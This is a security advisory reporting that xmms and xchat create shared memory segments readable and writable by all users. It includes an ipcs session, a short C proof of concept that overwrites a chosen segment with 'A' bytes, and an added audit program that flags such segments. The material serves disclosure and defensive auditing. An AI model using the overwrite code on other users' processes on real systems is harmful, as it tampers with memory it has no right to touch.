xmms/xchat: shared memory segments are accessible to all users

Published: 2001-11-06
Updated: 2001-11-06
Severity: High
Threat level: Server information disclosure
Error type: Design error
Exploitation method: Server mode
Affected systems: xmms/xchat

Detailed description: xmms/xchat

Test code:

slackware 8 :

    bash-2.05$ ipcs -m

    ------ Shared Memory Segments --------
    key        shmid      owner      perms      bytes      nattch     status
    0x00000000 4216960    mayhem     777        196608     2          dest
    0x00000000 7636737    mayhem     777        196608     2          dest

    bash-2.05$ ipcs -p -m

    ------ Shared Memory Creator/Last-op --------
    shmid      owner      cpid       lpid
    4216960    mayhem     3921       1406
    7636737    mayhem     26206      26209

    bash-2.05$ cat /proc/3921/cmdline ; echo
    /opt/gnome/bin/xmms
    bash-2.05$ cat /proc/26206/cmdline ; echo
    /opt/gnome/bin/xchat
    bash-2.05$

Seems not to be exploitable (no fault) but still needs to be fixed.

    /*
    ** test_shm.c
    **
    ** Made by Julien Vanegue
    ** Login <mayhem@hert.org>
    */
    #include <sys/types.h>
    #include <sys/ipc.h>
    #include <sys/shm.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>   /* memset */
    #include <unistd.h>   /* sleep */

    #define FATAL(str) { perror(str); exit(-1); }

    void usage()
    {
        fprintf(stderr, "syntax: a.out shmid size \n");
        exit(-1);
    }

    int main(int argc, char **argv)
    {
        char *addr;

        if (argc != 3)
            usage();
        /* Attach the segment named by the shmid that ipcs reported. */
        if ((addr = shmat(atoi(argv[1]), 0, 0)) == (void *) -1)
            FATAL("shmat");
        /* Fill the first <size> bytes of the segment with 'A'. */
        memset(addr, 'A', atoi(argv[2]));
        sleep(2);
        return 0;
    }

Solution: None yet

Related information: Julien VANEGUE (vanegu_j@epita.fr)

Reference: http://archives.neohapsis.com/archives/bugtraq/2001-11/0015.html
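The manual check in the ipcs session above (find segments with permissive modes, then identify the creating process) can be automated on Linux by reading /proc/sysvipc/shm. The following is an added example, not code from the original advisory; the sample rows are constructed, keeping only the first eight columns of that file and using uid 1000 and a third 600-mode row as assumptions.

```c
#include <stdio.h>
#include <string.h>

#define OTHER_RW 0006u  /* read (04) and write (02) bits for "other" users */

/* Constructed sample in /proc/sysvipc/shm layout (first eight columns only).
   The two 1777 rows mirror the segments listed by ipcs in the advisory
   (777 plus the "dest" flag, 01000); the 600 row is a contrast case. */
static const char SAMPLE[] =
    "       key      shmid perms       size  cpid  lpid nattch   uid\n"
    "         0    4216960  1777     196608  3921  1406      2  1000\n"
    "         0    7636737  1777     196608 26206 26209      2  1000\n"
    "         0    7700000   600     196608  4100  4100      1  1000\n";

struct shm_row { int shmid, cpid; unsigned perms, uid; };

/* Parse one data row (perms are octal); returns 1 on success, 0 otherwise. */
int parse_row(const char *line, struct shm_row *r)
{
    int key, lpid;
    unsigned long size, nattch;
    return sscanf(line, "%d %d %o %lu %d %d %lu %u", &key, &r->shmid,
                  &r->perms, &size, &r->cpid, &lpid, &nattch, &r->uid) == 8;
}

/* Print every segment that users outside owner and group can read or write,
   with the creator PID to look up in /proc/<cpid>/cmdline. Returns the count. */
int audit_shm(const char *text, FILE *out)
{
    int found = 0;
    for (const char *p = text; *p; p += strcspn(p, "\n"), p += (*p == '\n')) {
        struct shm_row r;
        if (!parse_row(p, &r) || !(r.perms & OTHER_RW))
            continue;  /* header line, unparsable row, or private segment */
        fprintf(out, "shmid %d perms %o uid %u cpid %d: world-accessible\n",
                r.shmid, r.perms, r.uid, r.cpid);
        found++;
    }
    return found;
}

int main(int argc, char **argv)
{
    static char buf[1 << 16];
    FILE *f = argc > 1 ? fopen(argv[1], "r") : NULL;
    if (argc > 1 && !f) { perror(argv[1]); return 2; }
    if (f) { buf[fread(buf, 1, sizeof buf - 1, f)] = '\0'; fclose(f); }
    return audit_shm(argc > 1 ? buf : SAMPLE, stdout) ? 1 : 0;
}
```

Run it with /proc/sysvipc/shm as the argument to audit a live Linux system; with no argument it audits the constructed sample. The exit status is 1 when any world-accessible segment is found.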